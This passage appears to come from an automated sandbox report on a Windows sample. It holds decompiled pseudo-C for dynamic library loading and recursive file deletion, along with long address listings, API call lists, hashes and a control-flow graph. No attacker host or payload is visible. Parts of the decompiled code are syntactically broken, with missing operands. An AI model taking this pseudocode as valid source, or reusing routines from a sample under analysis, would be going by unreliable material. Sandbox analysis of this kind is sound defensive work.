							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
							__eflags = _t360;
							 *(_t392 + 0x30) = _t360;
						}
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						_t377 =  *(_t392 + 0x28);
						__eflags = _t377;
						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
						__eflags = _t377;
						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						__eflags = _t377;
						_t355 = 0 | _t377 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						L13:
						 *(_t392 + 0x20) = _t379;
						_t368 =  *(_t392 + 0x40);
						__eflags = _t355;
						if(_t355 != 0) {
							goto L132;
						}
						L14:
						_t336 =  *(_t392 + 0x1c);
						goto L15;
					}
					_t361 = _t349 - 1;
					if(_t361 == 0) {
						_t380 =  *(_t392 + 0x28);
						__eflags = _t380;
						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						__eflags = _t380;
						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						__eflags = _t380;
						_t355 = 0 | _t380 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						goto L13;
					}
					if(_t361 != 0x16) {
						goto L14;
					} else {
						 *(_t392 + 0x1c) = 3;
						 *(_t392 + 0x18) = 1;
						goto L132;
					}
				}
				GlobalFree( *(_t392 + 0x44));
				GlobalFree( *(_t392 + 0x14));
				GlobalFree( *(_t392 + 0x38));
				if(_t382 == 0 ||  *(_t382 + 0x80c) != 0) {
					L181:
					return _t382;
				} else {
					_t249 =  *_t382 - 1;
					if(_t249 == 0) {
						_t215 = _t382 + 8; // 0x8
						_t386 = _t215;
						__eflags =  *_t386;
						if( *_t386 != 0) {
							_t250 = GetModuleHandleA(_t386);
							 *(_t382 + 0x808) = _t250;
							__eflags = _t250;
							if(_t250 != 0) {
								L169:
								_t220 = _t382 + 0x408; // 0x408
								_t387 = _t220;
								_t251 = E73C21ECE(_t250, _t387);
								 *(_t382 + 0x80c) = _t251;
								__eflags = _t251;
								if(_t251 == 0) {
									__eflags =  *_t387 - 0x23;
									if( *_t387 == 0x23) {
										_t222 = _t382 + 0x409; // 0x409
										_t255 = E73C21326();
										__eflags = _t255;
										if(_t255 != 0) {
											__eflags = _t255 & 0xffff0000;
											if((_t255 & 0xffff0000) == 0) {
												 *(_t382 + 0x80c) = GetProcAddress( *(_t382 + 0x808), _t255 & 0x0000ffff);
											}
										}
									}
								}
								__eflags =  *(_t392 + 0x3c);
								if( *(_t392 + 0x3c) != 0) {
									L176:
									_t252 = lstrlenA(_t387);
									_t323 = 0x41;
									_t387[_t252] = _t323;
									_t253 = E73C21ECE( *(_t382 + 0x808), _t387);
									__eflags = _t253;
									if(_t253 == 0) {
										__eflags =  *(_t382 + 0x80c);
										L179:
										if(__eflags != 0) {
											goto L181;
										}
										L180:
										_t233 = _t382 + 4;
										 *_t233 =  *(_t382 + 4) | 0xffffffff;
										__eflags =  *_t233;
										goto L181;
									}
									L177:
									 *(_t382 + 0x80c) = _t253;
									goto L181;
								} else {
									__eflags =  *(_t382 + 0x80c);
									if( *(_t382 + 0x80c) != 0) {
										goto L181;
									}
									goto L176;
								}
							}
							_t250 = LoadLibraryA(_t386);
							 *(_t382 + 0x808) = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								goto L180;
							}
							goto L169;
						}
						_t216 = _t382 + 0x408; // 0x408
						_t259 = E73C21326();
						 *(_t382 + 0x80c) = _t259;
						__eflags = _t259;
						goto L179;
					}
					_t260 = _t249 - 1;
					if(_t260 == 0) {
						_t214 = _t382 + 0x408; // 0x408
						_t261 = _t214;
						__eflags =  *_t261;
						if( *_t261 == 0) {
							goto L181;
						}
						_push(_t261);
						_t253 = E73C21326();
						goto L177;
					}
					if(_t260 != 1) {
						goto L181;
					}
					_t202 = _t382 + 8; // 0x8
					_t317 = _t202;
					_push(_t202);
					_t388 = E73C21326();
					 *(_t382 + 0x808) = _t388;
					if(_t388 == 0) {
						goto L180;
					}
					 *(_t382 + 0x84c) =  *(_t382 + 0x84c) & 0x00000000;
					_t264 = E73C212AF(_t317);
					 *(_t382 + 0x83c) =  *(_t382 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t382 + 0x850)) = _t264;
					 *((intOrPtr*)(_t382 + 0x848)) = 1;
					 *((intOrPtr*)(_t382 + 0x838)) = 1;
					_t211 = _t382 + 0x408; // 0x408
					_t253 =  *(_t388->i + E73C21326() * 4);
					goto L177;
				}
			}










































































                                                            0x73c22291
                                                            0x73c22295
                                                            0x73c22297
                                                            0x73c2229b
                                                            0x73c2229f
                                                            0x73c222a3
                                                            0x73c222a7
                                                            0x73c222ab
                                                            0x73c222af
                                                            0x73c222b4
                                                            0x73c222b8
                                                            0x73c222bf
                                                            0x73c222c3
                                                            0x73c222c8
                                                            0x73c222ca
                                                            0x73c222ce
                                                            0x73c222d0
                                                            0x73c222d4
                                                            0x73c222dc
                                                            0x73c222de
                                                            0x73c222de
                                                            0x73c222e0
                                                            0x73c222e6
                                                            0x00000000
                                                            0x00000000
                                                            0x73c222f0
                                                            0x73c222f3
                                                            0x73c222f7
                                                            0x73c222fc
                                                            0x73c222ff
                                                            0x73c227e3
                                                            0x73c227e3
                                                            0x73c227e3
                                                            0x73c227e8
                                                            0x73c227e8
                                                            0x73c227eb
                                                            0x73c2280c
                                                            0x73c2280e
                                                            0x73c22810
                                                            0x73c22812
                                                            0x73c2281b
                                                            0x73c22821
                                                            0x73c22823
                                                            0x73c22823
                                                            0x73c22825
                                                            0x73c2282b
                                                            0x73c2282b
                                                            0x73c22831
                                                            0x73c22835
                                                            0x73c22835
                                                            0x73c22838
                                                            0x73c22838
                                                            0x73c2283e
                                                            0x73c22840
                                                            0x73c22842
                                                            0x73c22844
                                                            0x73c2284a
                                                            0x73c22850
                                                            0x73c22853
                                                            0x73c22853
                                                            0x73c22855
                                                            0x73c2287e
                                                            0x73c22882
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22885
                                                            0x73c22887
                                                            0x73c2288d
                                                            0x73c22896
                                                            0x73c22899
                                                            0x73c2289b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2289d
                                                            0x73c2289d
                                                            0x73c2289d
                                                            0x73c228a3
                                                            0x73c228a5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c228a7
                                                            0x73c228a9
                                                            0x73c228a9
                                                            0x73c228ad
                                                            0x73c228af
                                                            0x73c228b1
                                                            0x73c228b1
                                                            0x73c228b1
                                                            0x73c228b1
                                                            0x73c228b8
                                                            0x73c228be
                                                            0x73c228c0
                                                            0x73c228d6
                                                            0x73c228d7
                                                            0x73c228d7
                                                            0x73c228d9
                                                            0x73c228c2
                                                            0x73c228c8
                                                            0x73c228cb
                                                            0x73c228cb
                                                            0x00000000
                                                            0x73c22857
                                                            0x73c22857
                                                            0x73c22857
                                                            0x73c2285a
                                                            0x73c22866
                                                            0x73c2286b
                                                            0x73c22871
                                                            0x73c22876
                                                            0x73c228df
                                                            0x73c228df
                                                            0x73c228e3
                                                            0x73c228e3
                                                            0x73c228e7
                                                            0x73c228e8
                                                            0x73c228ec
                                                            0x73c228f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c228f1
                                                            0x73c2285c
                                                            0x73c2285c
                                                            0x73c2285f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22861
                                                            0x73c22864
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22864
                                                            0x73c22855
                                                            0x73c227ed
                                                            0x73c227f0
                                                            0x73c227f6
                                                            0x73c227fe
                                                            0x73c22800
                                                            0x73c22800
                                                            0x73c22801
                                                            0x73c22801
                                                            0x00000000
                                                            0x73c227f0
                                                            0x73c22305
                                                            0x73c22308
                                                            0x73c22438
                                                            0x73c2243c
                                                            0x73c22440
                                                            0x73c2244c
                                                            0x73c2244c
                                                            0x73c22451
                                                            0x73c223ef
                                                            0x73c223ef
                                                            0x73c223ef
                                                            0x73c223f2
                                                            0x73c22746
                                                            0x73c2275e
                                                            0x73c2275e
                                                            0x73c22760
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2274c
                                                            0x73c2274d
                                                            0x73c22752
                                                            0x73c22754
                                                            0x73c2278a
                                                            0x73c2278b
                                                            0x73c2278f
                                                            0x73c22792
                                                            0x73c22794
                                                            0x00000000
                                                            0x73c22794
                                                            0x73c22756
                                                            0x73c22756
                                                            0x73c22756
                                                            0x73c2275b
                                                            0x73c2275b
                                                            0x73c22762
                                                            0x73c22764
                                                            0x73c227d3
                                                            0x73c227d4
                                                            0x73c227d8
                                                            0x73c227d8
                                                            0x73c227dc
                                                            0x73c227dc
                                                            0x00000000
                                                            0x73c227dc
                                                            0x73c22766
                                                            0x73c22768
                                                            0x73c2276e
                                                            0x73c2276e
                                                            0x73c22771
                                                            0x73c22774
                                                            0x73c2279a
                                                            0x73c2279a
                                                            0x73c2279a
                                                            0x73c2279d
                                                            0x73c227a0
                                                            0x00000000
                                                            0x00000000
                                                            0x73c227a2
                                                            0x73c227a5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c227a9
                                                            0x73c227aa
                                                            0x73c227ae
                                                            0x73c227ae
                                                            0x73c227b2
                                                            0x73c227b4
                                                            0x73c227b6
                                                            0x73c227cc
                                                            0x73c227b8
                                                            0x73c227bd
                                                            0x73c227c0
                                                            0x73c227c0
                                                            0x00000000
                                                            0x73c227b6
                                                            0x73c22776
                                                            0x73c22776
                                                            0x73c22779
                                                            0x73c2277c
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2277e
                                                            0x00000000
                                                            0x73c2277e
                                                            0x73c2276a
                                                            0x73c2276c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2276c
                                                            0x73c223f8
                                                            0x73c223f8
                                                            0x73c223fb
                                                            0x73c224cc
                                                            0x73c224d0
                                                            0x73c224d0
                                                            0x73c224d5
                                                            0x73c224d8
                                                            0x00000000
                                                            0x00000000
                                                            0x73c224de
                                                            0x73c224e5
                                                            0x00000000
                                                            0x73c2269f
                                                            0x73c226a3
                                                            0x73c226a5
                                                            0x73c226a9
                                                            0x73c226a9
                                                            0x73c226aa
                                                            0x73c226ad
                                                            0x73c226af
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226b1
                                                            0x73c226b1
                                                            0x73c226b4
                                                            0x73c226c7
                                                            0x73c226c8
                                                            0x73c226d0
                                                            0x00000000
                                                            0x73c226d0
                                                            0x73c226b6
                                                            0x73c226b6
                                                            0x73c226b8
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226ba
                                                            0x73c226bc
                                                            0x73c226be
                                                            0x73c226be
                                                            0x73c226be
                                                            0x73c226bf
                                                            0x73c226c2
                                                            0x73c226c4
                                                            0x73c226a9
                                                            0x73c226aa
                                                            0x73c226ad
                                                            0x73c226af
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226af
                                                            0x00000000
                                                            0x73c224b8
                                                            0x73c224bb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2253f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22526
                                                            0x73c2252a
                                                            0x73c2252c
                                                            0x73c22530
                                                            0x73c22531
                                                            0x73c22532
                                                            0x73c22536
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22671
                                                            0x73c22675
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2267c
                                                            0x73c22685
                                                            0x73c22687
                                                            0x73c2268b
                                                            0x73c2268d
                                                            0x73c22693
                                                            0x73c22694
                                                            0x73c22695
                                                            0x73c2269a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22634
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22549
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226f2
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22551
                                                            0x73c22553
                                                            0x73c22554
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226e2
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226e6
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226ee
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22598
                                                            0x73c22598
                                                            0x73c2259a
                                                            0x73c2259a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22564
                                                            0x73c22566
                                                            0x73c22567
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22577
                                                            0x73c22579
                                                            0x73c2257a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225aa
                                                            0x73c225aa
                                                            0x73c225ac
                                                            0x73c225ac
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22583
                                                            0x73c22583
                                                            0x73c22585
                                                            0x73c22585
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2258c
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226ea
                                                            0x73c226f4
                                                            0x73c226f4
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2263d
                                                            0x73c22642
                                                            0x73c22648
                                                            0x73c2264a
                                                            0x73c2264b
                                                            0x73c2264b
                                                            0x73c2264e
                                                            0x73c22650
                                                            0x73c22652
                                                            0x73c22653
                                                            0x73c22656
                                                            0x73c22656
                                                            0x73c22658
                                                            0x73c22658
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226dd
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22590
                                                            0x73c22594
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2254d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225a1
                                                            0x73c225a1
                                                            0x73c225a3
                                                            0x73c225a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c224ec
                                                            0x73c224f4
                                                            0x73c224f6
                                                            0x73c224f8
                                                            0x73c224fb
                                                            0x73c224ff
                                                            0x73c22503
                                                            0x73c2250b
                                                            0x73c22510
                                                            0x73c22517
                                                            0x73c22519
                                                            0x73c2251a
                                                            0x73c2251d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22558
                                                            0x73c2255a
                                                            0x73c2255a
                                                            0x73c2255b
                                                            0x73c2255b
                                                            0x73c2255d
                                                            0x73c2255e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2259d
                                                            0x73c2259d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2256b
                                                            0x73c2256d
                                                            0x73c2256d
                                                            0x73c2256e
                                                            0x73c2256e
                                                            0x73c22570
                                                            0x73c22571
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2257e
                                                            0x73c22580
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225af
                                                            0x73c225af
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22588
                                                            0x73c22588
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2265e
                                                            0x73c22663
                                                            0x73c22668
                                                            0x73c2266c
                                                            0x73c2266c
                                                            0x73c226d2
                                                            0x73c226d2
                                                            0x73c226d3
                                                            0x73c226d3
                                                            0x73c226d5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226f5
                                                            0x73c226f5
                                                            0x73c226fb
                                                            0x73c226fc
                                                            0x73c22700
                                                            0x73c22702
                                                            0x73c2272c
                                                            0x73c2272e
                                                            0x73c22730
                                                            0x73c22732
                                                            0x73c22732
                                                            0x73c22735
                                                            0x73c22735
                                                            0x73c2273c
                                                            0x73c2273d
                                                            0x00000000
                                                            0x73c2273d
                                                            0x73c22704
                                                            0x73c22707
                                                            0x73c2270e
                                                            0x73c22711
                                                            0x73c22718
                                                            0x73c22719
                                                            0x73c2271f
                                                            0x73c22723
                                                            0x73c22723
                                                            0x00000000
                                                            0x73c22723
                                                            0x73c22713
                                                            0x73c22716
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225a6
                                                            0x73c225a6
                                                            0x73c225b1
                                                            0x73c225b1
                                                            0x73c225b2
                                                            0x73c225b2
                                                            0x73c225b9
                                                            0x73c225bb
                                                            0x73c225be
                                                            0x73c225c0
                                                            0x73c225c2
                                                            0x73c225c4
                                                            0x73c225cc
                                                            0x73c225d2
                                                            0x73c225d6
                                                            0x73c225d7
                                                            0x73c225de
                                                            0x73c225e2
                                                            0x73c225e4
                                                            0x73c225e7
                                                            0x73c225e9
                                                            0x73c225ea
                                                            0x73c225ed
                                                            0x73c225f4
                                                            0x73c225f6
                                                            0x73c225f8
                                                            0x73c225fd
                                                            0x73c22602
                                                            0x73c22607
                                                            0x73c22607
                                                            0x73c2260a
                                                            0x73c2260a
                                                            0x73c2260e
                                                            0x73c22616
                                                            0x73c22619
                                                            0x73c2261c
                                                            0x73c22623
                                                            0x73c22627
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c224e5
                                                            0x73c22401
                                                            0x73c22401
                                                            0x73c22404
                                                            0x73c224c4
                                                            0x73c224c6
                                                            0x00000000
                                                            0x73c224c6
                                                            0x73c2240a
                                                            0x73c2240d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22413
                                                            0x73c22416
                                                            0x73c2247b
                                                            0x73c2247b
                                                            0x73c2247e
                                                            0x73c22498
                                                            0x73c2249a
                                                            0x73c2249a
                                                            0x73c2249b
                                                            0x73c2249b
                                                            0x73c224a4
                                                            0x73c224a8
                                                            0x73c224b0
                                                            0x73c224b0
                                                            0x73c224aa
                                                            0x73c224aa
                                                            0x73c224aa
                                                            0x73c224b2
                                                            0x00000000
                                                            0x73c224b2
                                                            0x73c22480
                                                            0x73c22480
                                                            0x73c22483
                                                            0x73c22494
                                                            0x00000000
                                                            0x73c22494
                                                            0x73c22487
                                                            0x73c22488
                                                            0x73c2248a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22490
                                                            0x00000000
                                                            0x73c22490
                                                            0x73c22418
                                                            0x73c22477
                                                            0x00000000
                                                            0x73c22477
                                                            0x73c2241a
                                                            0x73c2241a
                                                            0x73c2241d
                                                            0x73c2246e
                                                            0x00000000
                                                            0x73c2246e
                                                            0x73c2241f
                                                            0x73c2241f
                                                            0x73c22422
                                                            0x73c22467
                                                            0x00000000
                                                            0x73c22467
                                                            0x73c22424
                                                            0x73c22424
                                                            0x73c22427
                                                            0x73c22464
                                                            0x00000000
                                                            0x73c22464
                                                            0x73c2242b
                                                            0x73c2242c
                                                            0x73c2242e
                                                            0x00000000
                                                            0x73c22434
                                                            0x73c22434
                                                            0x00000000
                                                            0x73c22434
                                                            0x73c2242e
                                                            0x73c22453
                                                            0x73c22458
                                                            0x00000000
                                                            0x73c22458
                                                            0x73c22442
                                                            0x73c22446
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22448
                                                            0x73c2244a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2244a
                                                            0x73c2230e
                                                            0x73c22311
                                                            0x73c22378
                                                            0x73c2237d
                                                            0x73c22382
                                                            0x73c22388
                                                            0x73c22390
                                                            0x73c22390
                                                            0x73c22391
                                                            0x73c22391
                                                            0x73c22399
                                                            0x73c2239e
                                                            0x73c223a2
                                                            0x73c223a4
                                                            0x73c223a9
                                                            0x73c223b1
                                                            0x73c223b6
                                                            0x73c223b8
                                                            0x73c223bd
                                                            0x73c223c3
                                                            0x73c223c9
                                                            0x73c223cc
                                                            0x73c223d1
                                                            0x73c223d6
                                                            0x73c223db
                                                            0x73c223db
                                                            0x73c223df
                                                            0x73c223e3
                                                            0x73c223e5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c223eb
                                                            0x73c223eb
                                                            0x00000000
                                                            0x73c223eb
                                                            0x73c22313
                                                            0x73c22316
                                                            0x73c22335
                                                            0x73c22339
                                                            0x73c2233f
                                                            0x73c22344
                                                            0x73c2234c
                                                            0x73c22351
                                                            0x73c22353
                                                            0x73c22358
                                                            0x73c2235e
                                                            0x73c22364
                                                            0x73c22367
                                                            0x73c2236c
                                                            0x73c22371
                                                            0x00000000
                                                            0x73c22371
                                                            0x73c2231b
                                                            0x00000000
                                                            0x73c22321
                                                            0x73c22323
                                                            0x73c2232c
                                                            0x00000000
                                                            0x73c2232c
                                                            0x73c2231b
                                                            0x73c22901
                                                            0x73c22907
                                                            0x73c2290d
                                                            0x73c22911
                                                            0x73c22a8a
                                                            0x73c22a93
                                                            0x73c22925
                                                            0x73c22927
                                                            0x73c2292a
                                                            0x73c229b5
                                                            0x73c229b5
                                                            0x73c229b8
                                                            0x73c229ba
                                                            0x73c229d7
                                                            0x73c229dd
                                                            0x73c229e3
                                                            0x73c229e5
                                                            0x73c229fc
                                                            0x73c229fc
                                                            0x73c229fc
                                                            0x73c22a04
                                                            0x73c22a09
                                                            0x73c22a11
                                                            0x73c22a13
                                                            0x73c22a15
                                                            0x73c22a18
                                                            0x73c22a1a
                                                            0x73c22a21
                                                            0x73c22a27
                                                            0x73c22a29
                                                            0x73c22a2b
                                                            0x73c22a30
                                                            0x73c22a42
                                                            0x73c22a42
                                                            0x73c22a30
                                                            0x73c22a29
                                                            0x73c22a18
                                                            0x73c22a48
                                                            0x73c22a4c
                                                            0x73c22a56
                                                            0x73c22a57
                                                            0x73c22a5f
                                                            0x73c22a61
                                                            0x73c22a6b
                                                            0x73c22a72
                                                            0x73c22a74
                                                            0x73c22a7e
                                                            0x73c22a84
                                                            0x73c22a84
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22a86
                                                            0x73c22a86
                                                            0x73c22a86
                                                            0x73c22a86
                                                            0x00000000
                                                            0x73c22a86
                                                            0x73c22a76
                                                            0x73c22a76
                                                            0x00000000
                                                            0x73c22a4e
                                                            0x73c22a4e
                                                            0x73c22a54
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22a54
                                                            0x73c22a4c
                                                            0x73c229e8
                                                            0x73c229ee
                                                            0x73c229f4
                                                            0x73c229f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c229f6
                                                            0x73c229bc
                                                            0x73c229c3
                                                            0x73c229c9
                                                            0x73c229cf
                                                            0x00000000
                                                            0x73c229cf
                                                            0x73c22930
                                                            0x73c22933
                                                            0x73c2299b
                                                            0x73c2299b
                                                            0x73c229a1
                                                            0x73c229a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c229a9
                                                            0x73c229aa
                                                            0x00000000
                                                            0x73c229af
                                                            0x73c22938
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2293e
                                                            0x73c2293e
                                                            0x73c22941
                                                            0x73c22947
                                                            0x73c22949
                                                            0x73c22952
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22958
                                                            0x73c22960
                                                            0x73c22965
                                                            0x73c2296c
                                                            0x73c22975
                                                            0x73c2297b
                                                            0x73c22981
                                                            0x73c22994
                                                            0x00000000
                                                            0x73c22994

                                                            APIs
                                                              • Part of subcall function 73C212C6: GlobalAlloc.KERNELBASE(00000040,73C211C4,-000000A0), ref: 73C212CE
                                                            • lstrcpyA.KERNEL32(?,?), ref: 73C227C0
                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73C2281B
                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73C2286B
                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73C22876
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C22887
                                                            • GlobalFree.KERNEL32(?), ref: 73C22901
                                                            • GlobalFree.KERNEL32(?), ref: 73C22907
                                                            • GlobalFree.KERNEL32(?), ref: 73C2290D
                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73C229D7
                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73C229E8
                                                            • GetProcAddress.KERNEL32(?,?), ref: 73C22A3C
                                                            • lstrlenA.KERNEL32(00000408), ref: 73C22A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID: :
                                                            • API String ID: 245916457-336475711
                                                            • Opcode ID: 23520d5b9faf97f8872734a31e9929bf4ee55f54f0da92addc1b786978e0e2aa
                                                            • Instruction ID: 7a2082491c9ed925c465a8e0e351ce82dae40cec58c86f9adb61afd57c447bcb
                                                            • Opcode Fuzzy Hash: 23520d5b9faf97f8872734a31e9929bf4ee55f54f0da92addc1b786978e0e2aa
                                                            • Instruction Fuzzy Hash: A832E37260870A9FD385CF35C84075ABFF5BF88716F458A2DE49ACA294DB30D945CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405A19 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 857 405a19-405a3f call 405cd7 860 405a41-405a53 DeleteFileA 857->860 861 405a58-405a5f 857->861 862 405be2-405be6 860->862 863 405a61-405a63 861->863 864 405a72-405a82 call 406257 861->864 865 405b90-405b95 863->865 866 405a69-405a6c 863->866 872 405a91-405a92 call 405c30 864->872 873 405a84-405a8f lstrcatA 864->873 865->862 869 405b97-405b9a 865->869 866->864 866->865 870 405ba4-405bac call 4065ce 869->870 871 405b9c-405ba2 869->871 870->862 880 405bae-405bc2 call 405be9 call 4059d1 870->880 871->862 875 405a97-405a9a 872->875 873->875 878 405aa5-405aab lstrcatA 875->878 879 405a9c-405aa3 875->879 881 405ab0-405ace lstrlenA FindFirstFileA 878->881 879->878 879->881 896 405bc4-405bc7 880->896 897 405bda-405bdd call 405378 880->897 883 405ad4-405aeb call 405c14 881->883 884 405b86-405b8a 881->884 890 405af6-405af9 883->890 891 405aed-405af1 883->891 884->865 886 405b8c 884->886 886->865 894 405afb-405b00 890->894 895 405b0c-405b1a call 406257 890->895 891->890 893 405af3 891->893 893->890 899 405b02-405b04 894->899 900 405b65-405b77 FindNextFileA 894->900 907 405b31-405b3c call 4059d1 895->907 908 405b1c-405b24 895->908 896->871 902 405bc9-405bd8 call 405378 call 406030 896->902 897->862 899->895 903 405b06-405b0a 899->903 900->883 905 405b7d-405b80 FindClose 900->905 902->862 903->895 903->900 905->884 916 405b5d-405b60 call 405378 907->916 917 405b3e-405b41 907->917 908->900 910 405b26-405b2f call 405a19 908->910 910->900 916->900 919 405b43-405b53 call 405378 call 406030 917->919 920 405b55-405b5b 917->920 919->900 920->900
                                                            C-Code - Quality: 98%
                                                            			E00405A19(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD7(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4524a8 =  *0x4524a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406257(0x444098, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C30(_t73);
					} else {
						lstrcatA(0x444098, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x444098,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C14( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
